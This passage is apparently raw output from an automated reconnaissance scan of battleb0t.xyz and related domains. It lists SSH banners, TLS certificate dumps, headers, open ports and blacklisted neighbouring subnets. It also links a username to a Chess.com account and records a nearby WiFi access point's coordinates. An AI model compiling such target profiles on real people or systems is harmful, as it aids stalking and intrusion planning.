"www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", 
"ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 02:44:37 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:91:08:65:b4:56:94:e3:89:37:6b:c8:ee:5a:fc:f4:80:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:05:11 2023 GMT
Not After : May 25 03:05:10 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:97:4b:9a:94:33:ae:7c:5e:91:1b:d8:54:22:c9:
ed:4f:8d:dc:1c:ea:82:e7:c1:66:b8:0e:7a:d7:69:
7e:97:11:2c:1a:a5:0e:64:16:12:d5:94:b3:23:f2:
36:d4:4f:eb:d5:32:50:ac:e4:d7:66:1b:e3:da:91:
79:04:66:f4:2d:fa:3e:45:f4:48:91:1a:8d:80:82:
ca:dd:66:18:cd:f2:9d:87:0d:96:09:36:f0:90:50:
74:b3:8f:d1:d4:ab:e5:3c:ba:a6:ad:57:62:22:2b:
60:de:6e:76:04:02:5d:fa:52:80:b7:61:6b:ca:89:
0e:51:38:c3:f2:4d:c1:8f:3e:5c:2f:86:ec:7a:ee:
c4:a9:09:67:fe:3a:36:2c:f4:71:dd:63:52:c7:7e:
24:13:3b:f8:64:ac:0f:17:65:8b:4f:12:db:ba:8b:
96:d7:a7:d3:5c:fd:8f:e9:26:b0:c1:d3:ce:ae:a4:
80:9b:8d:9b:1f:f6:ca:4a:88:4f:be:ed:28:2f:45:
12:8d:ed:28:4a:e1:d7:0a:d1:cc:4f:38:0f:fa:93:
2d:8d:4a:92:3a:88:82:01:24:a7:62:52:95:88:cb:
f5:21:eb:4e:1f:14:59:fb:a0:f3:53:6c:6e:20:e1:
ca:0b:83:46:36:34:c6:22:17:1b:d8:e6:82:24:68:
ca:65
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
af:5e:3d:7d:a9:f5:42:9c:1d:2f:03:2d:1b:0d:2f:10:cb:50:
f1:b5:52:99:81:26:41:e3:0e:8b:3f:d6:44:9c:4d:76:a0:c9:
2e:6c:74:7c:a4:74:32:5e:57:3b:4d:1a:2e:c8:ca:50:8a:41:
64:52:bd:34:33:b5:79:5d:6f:b7:40:8d:f2:19:bb:9c:7a:f4:
53:d5:b8:14:be:47:eb:83:11:3f:9b:a8:6d:e6:50:9c:00:fd:
45:a4:e9:b5:c8:1a:e6:9f:65:a0:32:31:9a:f4:eb:55:67:d1:
e8:ef:64:3e:f6:9d:83:1d:d7:4f:bc:78:a6:79:31:b0:72:dc:
bc:76:08:92:82:2c:2d:62:96:6a:ea:10:aa:8b:9f:01:37:82:
68:e8:21:18:0b:93:ec:a2:d9:e4:7d:db:8d:03:6c:29:66:26:
48:37:dc:c6:b4:07:9f:89:13:5d:3c:d0:15:d9:f0:41:fb:6f:
a6:03:d7:5c:9d:60:ab:11:be:88:8c:49:85:6b:01:3f:1f:cf:
9f:fe:17:89:e9:00:42:c3:57:e3:c8:42:f8:cd:c4:7b:bc:1f:
29:1b:d5:94:0f:7c:11:23:e1:b3:ae:8d:51:5a:7e:0b:bb:e0:
95:37:98:35:9f:61:ad:e4:68:dc:1c:77:b3:9e:f7:ce:95:dd:
52:35:dd:a6
|
| 2023-05-12 03:00:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.53): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:42 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
Subject: CN=nwapi2.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:56:92:fa:17:84:ee:f0:d0:57:46:44:1b:c0:
a4:14:29:10:a1:ef:73:a4:e7:64:f7:b5:e7:3f:b3:
66:76:75:96:94:eb:49:c3:b4:7b:98:99:f2:0f:53:
8b:0d:5d:a1:7d:07:f5:ec:33:33:f7:d8:24:d7:52:
d5:12:6d:a1:1f:e4:a6:4e:04:dc:3d:ec:3d:be:c0:
68:52:81:bd:0e:b0:f2:dc:e9:9e:c3:80:ab:29:55:
f9:1e:e7:5b:91:26:2d:a5:23:af:31:21:a7:26:77:
4d:22:98:0f:3c:48:92:7d:11:24:a2:2a:0b:37:5b:
b7:75:5d:9c:47:56:23:11:ea:1f:65:df:5a:99:2d:
b1:7c:34:88:13:dd:65:4f:a0:08:9d:d3:51:25:a6:
78:33:43:63:15:48:98:b7:c9:2d:ff:76:3d:7c:7e:
de:53:44:95:89:fa:a0:73:8e:18:62:72:8d:27:49:
aa:9c:1f:aa:7b:22:63:3f:e5:47:2d:46:e9:11:a7:
d9:be:31:17:58:ae:26:cb:94:ea:b8:74:2e:d5:e8:
97:bd:26:29:ad:75:15:d7:0b:3c:87:ec:7d:26:04:
ba:6b:7d:a6:11:27:4a:69:b1:b7:ca:99:b8:9d:ff:
7b:56:12:82:6a:1b:ca:28:1f:06:65:69:79:cd:93:
18:d1:f0:f1:97:01:54:01:52:f9:a4:bc:b1:5f:7f:
07:cd:e4:2b:75:9a:b4:04:a5:b3:96:5c:fa:5f:34:
4a:10:9c:af:38:59:33:75:87:74:42:bf:9b:c5:16:
68:7e:6e:ef:bf:b4:49:f4:b3:b2:df:03:0b:41:57:
bd:9d:b3:e1:0a:ab:4d:b6:f0:4f:0a:55:ab:67:0d:
47:01:8e:e0:df:09:34:38:59:4b:e4:b2:f9:93:a9:
14:cd:7f:e8:59:e4:10:fd:c1:6c:48:fa:be:99:2c:
29:f5:4b:bb:ec:4a:d6:b7:12:55:98:93:98:eb:47:
5c:a0:a4:28:64:3b:23:a2:ef:82:47:19:63:8d:bd:
5b:18:22:cf:f0:62:27:bf:ee:4a:28:c1:7c:e2:7b:
78:12:dd:d5:e8:7d:85:3e:1e:0f:49:a2:f3:4c:aa:
0d:2d:cc:58:f9:3e:e7:38:d6:30:4c:04:5a:18:cf:
9c:92:c9:94:e0:25:8d:f8:47:4e:48:b9:1f:15:b5:
e5:de:4b:35:84:12:32:49:2b:fa:a7:68:2a:1b:83:
d8:7f:e6:d9:7f:ca:74:5f:b4:c9:a0:67:b2:29:ff:
a2:1e:11:be:bc:99:7a:fb:44:7b:a4:fe:9c:6b:8f:
e3:20:e4:b7:4f:84:65:a3:c1:39:7b:b5:4f:1d:d0:
69:a0:23
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CB:34:4D:A2:38:84:54:47:A0:B5:F7:DD:3C:83:22:CF:57:4A:1C:21
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi2.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : May 4 20:22:49.987 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:49:5B:22:9A:37:74:EC:B5:6B:BF:74:25:
03:BF:46:DC:18:51:D6:44:11:7B:BF:B6:5B:50:DD:1C:
8F:80:EF:3B:02:20:47:2A:69:10:84:9E:DC:B5:E3:E3:
85:D7:64:E9:81:E6:34:A8:3A:EE:7B:C1:B6:5E:40:1F:
80:29:DA:11:05:13
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : May 4 20:22:50.005 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:35:7C:BF:0E:AA:9D:74:86:07:D7:D4:AB:
F5:E1:40:37:B8:BB:7E:DB:39:8A:BE:E2:5C:03:30:30:
87:33:6B:95:02:20:09:90:FF:C6:9A:73:8C:96:C5:27:
7D:6B:43:B6:38:71:2C:A6:63:43:70:C3:FA:5D:5B:71:
98:69:EE:13:00:4E
Signature Algorithm: sha256WithRSAEncryption
85:ff:2d:f7:ea:a0:91:b7:ce:aa:d9:bb:80:7c:e2:3c:82:5e:
aa:e4:8e:68:39:36:38:9c:77:b6:ea:24:b5:71:a4:68:73:d2:
cb:e4:b6:6e:87:92:cd:60:f0:4b:fa:16:3c:67:67:24:50:45:
a7:67:96:84:cc:d3:58:c6:5e:dc:44:85:ed:d6:81:ec:7f:49:
41:4d:c5:ca:ca:aa:32:ad:d7:11:f7:39:7b:b0:7b:77:74:44:
f7:cb:92:93:e4:45:e9:c1:4b:22:0e:6a:87:26:da:2f:86:c9:
2f:7d:8a:b8:0e:fa:c8:7d:05:d7:2e:5e:0f:61:c0:b7:f9:d9:
51:31:63:4f:68:5d:de:cc:22:12:04:48:9b:ee:41:d8:a5:b1:
3c:80:9c:7b:d1:ae:a7:5b:ac:bf:bc:03:e4:36:bf:0d:18:f2:
3c:c8:4d:81:d8:71:4f:93:f8:89:4f:b8:cc:c6:d5:23:b9:6b:
01:1a:ea:aa:63:1c:40:bd:2f:59:0a:34:b7:be:8a:f1:7e:27:
85:d0:0e:96:7f:f0:0b:eb:18:35:77:95:6b:27:bf:9c:18:72:
58:89:63:0e:ed:84:1b:cb:e1:47:d4:7e:b0:01:ca:b1:c2:f0:
7c:b9:e4:20:fc:db:bd:c2:a6:6c:47:1a:fc:14:e6:86:84:df:
57:0b:c2:0b
| battleb0t.xyz |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | cPanel cPanel | 87.248.157.102 |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.166): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:53:32 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["E9B4:1F0F:9CADE8:E25A67:645D08C5"], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-klot8100040-CHI"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683818693.056035,VS0,VE27"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["695e2aec93a90cc9e1a6417b158a1f1d94a5129d"], "Content_Type": ["text/html; charset=utf-8"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 185.199.111.153 |
| 2023-05-12 03:17:57 | Malicious IP on Same Subnet | Yes | CINS Army List | 0 | 0 | 4 | 0 | None | cinsscore.com [34.148.96.0/20]
http://cinsscore.com/list/ci-badguys.txt | 34.148.96.0/20 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=*.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0031.github.io | 185.199.111.153 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.12): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:8080 | 172.67.135.9 |
| 2023-05-12 03:27:00 | Web Technology | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | Express | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Chess.com (Category: gaming)
https://www.chess.com/member/ayshoo | ayshoo |
| 2023-05-12 02:45:59 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Chicago', u'security': {u'is_vpn': False}, u'city_geoname_id': 4887398, u'region_geoname_id': 4896861, u'country': u'United States', u'region': u'Illinois', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'60666', u'longitude': -87.6298, u'country_code': u'US', u'timezone': {u'abbreviation': u'', u'gmt_offset': u'', u'is_dst': u'', u'name': u'', u'current_time': u''}, u'latitude': 41.8781, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'104.21.71.14', u'continent': u'North America', u'region_iso_code': u'IL'} | 104.21.71.14 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | cloudflaressl.com |
| 2023-05-12 02:54:51 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 34.74.160.0/20 | 34.74.170.74 |
| 2023-05-12 02:45:51 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Montreal, Quebec, H4X, United States, North America | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Special Litigation (Net ID: 00:02:2D:2E:93:90) | 34.0544, -118.244 |
| 2023-05-12 02:44:26 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:03:e6:77:f0:fb:1d:de:0e:93:d2:d9:e5:40:98:fb:b1:42
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Nov 17 08:07:50 2022 GMT
Not After : Feb 15 08:07:49 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:b1:ca:c5:7f:45:88:ea:f6:98:9e:7e:93:33:29:
bd:74:fc:48:fe:29:e9:2a:62:8c:97:f1:93:16:6f:
19:da:24:7c:94:17:6e:35:5b:b2:ef:eb:77:ee:6f:
68:a3:10:bb:0d:f6:01:57:78:db:8f:85:23:65:1b:
8d:5a:d8:02:5e
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
26:F8:75:40:42:15:34:A1:4E:96:C0:96:27:7F:34:DA:52:69:CF:39
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Nov 17 09:07:51.072 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:16:9A:44:87:BF:E8:FB:88:4F:27:C3:23:
D7:41:4A:F8:BC:44:42:20:18:B7:8C:EF:CD:C8:5C:14:
86:9C:04:8F:02:21:00:D8:FC:B1:DA:CE:C1:81:91:75:
82:10:9B:4A:3A:12:1B:FE:70:80:7F:A6:84:E4:C5:04:
58:38:0B:34:F3:1E:73
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 09:07:51.066 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:15:CD:95:9A:3C:F7:20:93:54:3E:08:F7:
6D:D4:73:9D:63:2C:14:38:C7:1C:15:38:7A:3E:1C:B5:
3A:C9:C0:A8:02:21:00:C8:7B:89:3A:AC:D8:F0:69:E9:
DE:74:9E:7E:74:A9:4E:43:C7:89:2C:62:13:65:90:95:
4A:78:C6:0D:71:91:72
Signature Algorithm: ecdsa-with-SHA384
30:65:02:30:19:f9:7b:55:14:7a:4c:2b:b8:a8:55:31:bc:66:
14:95:52:8a:fe:84:4c:61:c2:02:53:4a:80:96:e1:54:a7:b8:
65:6c:70:ad:b8:e9:f0:44:9d:f5:1e:5f:f5:49:05:26:02:31:
00:af:38:a6:7e:99:e5:40:3e:28:0a:04:fc:e6:28:1e:0b:3b:
f4:a2:30:3a:2a:98:5c:14:93:92:27:5b:5b:a6:49:e2:da:ff:
a7:8f:34:6f:32:35:7e:32:3c:5a:8b:ec:81
| battleb0t.xyz |
| 2023-05-12 02:53:44 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:15:41:ea:93:cd:8d:62:0f:07:0f:be:37:47:74:c1:ad:1b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:26 2022 GMT
Not After : Feb 15 17:26:25 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:aa:4d:69:12:67:d1:ef:14:86:20:9d:cf:2c:a8:
0d:c9:a7:6c:06:2b:6c:f8:9e:1f:f7:5b:41:e3:d6:
87:ca:57:bb:98:07:35:18:67:8f:28:74:6a:04:77:
89:a0:80:85:fc:4d:2e:7a:12:ee:d9:55:9b:e8:51:
03:88:3d:06:0a:14:47:b6:c6:bf:e2:f2:6e:38:57:
77:d8:da:10:9f:18:48:30:90:76:66:83:1b:18:b6:
6d:f9:38:58:a1:cc:7b:d2:96:34:23:9b:ea:85:2c:
bb:61:4a:ef:9a:58:1e:2d:73:fc:eb:20:c5:37:d4:
7c:8e:77:66:2d:b6:0a:4e:0d:e0:f4:1d:87:9f:f3:
39:d7:d9:45:03:a6:8f:40:08:8a:3e:d5:15:b6:01:
8a:08:27:45:ff:cb:af:e5:d1:fd:28:cb:df:75:d3:
f7:db:3d:e9:43:0c:e5:b6:28:89:d2:ba:63:6c:e0:
ac:03:c0:49:9f:2c:e6:11:96:03:1a:33:a3:63:63:
dc:3b:1c:a8:9b:0f:00:ea:cb:bf:0c:39:fd:1c:40:
ab:3a:92:ca:b0:90:5c:21:ed:f1:8e:4f:9e:e7:92:
92:53:94:1d:fa:e2:36:84:fa:2a:17:63:6d:d0:c9:
16:92:48:c8:82:19:57:63:48:56:6e:6a:2e:34:87:
cc:7c:79:cf:43:dc:a4:a2:fb:e4:06:17:02:db:ef:
92:10:48:04:d1:04:89:aa:65:ee:9d:e2:a1:cd:ce:
9c:27:f6:46:3e:9e:91:90:6e:12:78:d2:cd:5e:a3:
75:48:b4:82:f5:c9:29:da:c5:bb:ac:87:af:95:fa:
f8:49:db:fe:e5:df:04:7e:92:10:6e:c8:d7:7b:93:
ef:de:5b:4f:7a:70:41:0c:59:d9:04:5e:26:57:3d:
65:af:57:00:3d:40:e4:ec:3b:92:38:0a:d1:a5:20:
31:40:89:48:9a:58:46:06:1e:56:4f:e5:25:e6:f5:
33:d9:bb:68:90:99:70:c6:a1:93:5a:22:c1:e3:ee:
da:ef:45:a4:37:18:4c:33:42:7e:6f:07:01:85:ed:
36:f3:3f:be:f6:6a:d9:3e:fe:ad:4c:8d:18:3e:0e:
49:d9:7a:95:04:47:e8:2c:a9:fe:24:7a:53:d0:af:
27:b2:85:89:f7:05:df:d8:9a:0d:56:23:cd:ee:11:
cb:31:f6:4e:3f:af:22:51:d3:a0:8f:a4:52:72:6f:
12:6d:6d:c2:7a:fe:c4:93:c1:f6:23:a9:9a:2b:35:
9d:df:e3:e9:99:57:fb:f5:e8:d9:e8:4d:a5:ec:7e:
dd:22:c5:d3:4f:c7:2d:bf:e4:09:ee:6f:cb:b6:13:
f8:ae:73
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CE:03:E9:CB:9A:4D:5E:BB:32:45:93:FC:78:CC:A3:7F:08:26:B1:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 18:26:26.989 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:1A:E4:CF:4C:AD:D9:EC:E6:4D:52:65:1B:
53:65:93:D9:DC:39:99:A6:D5:5A:C5:E1:DA:D9:DC:69:
36:3C:98:86:02:21:00:E0:F7:55:18:14:DF:74:E8:00:
3D:35:13:2B:3F:8A:22:AD:87:C6:66:15:7C:5F:B8:54:
95:49:86:D0:08:0C:1B
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 18:26:27.535 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:10:EE:87:AF:95:13:B6:C6:D8:9A:F6:9C:
22:3D:17:76:A6:CE:D0:EB:19:02:D0:A5:1A:1A:C9:0A:
31:65:BA:ED:02:21:00:BF:DA:3B:7E:F3:78:A8:0B:93:
1F:B2:E6:E1:12:B5:BD:BA:22:84:17:45:4A:B3:61:A0:
29:F4:AF:0F:35:96:20
Signature Algorithm: sha256WithRSAEncryption
b5:83:07:c9:de:56:9d:a9:96:e7:9d:33:0e:6f:ac:fa:87:16:
78:39:67:66:6c:ed:a2:8a:03:1a:72:05:18:f6:0f:96:45:6f:
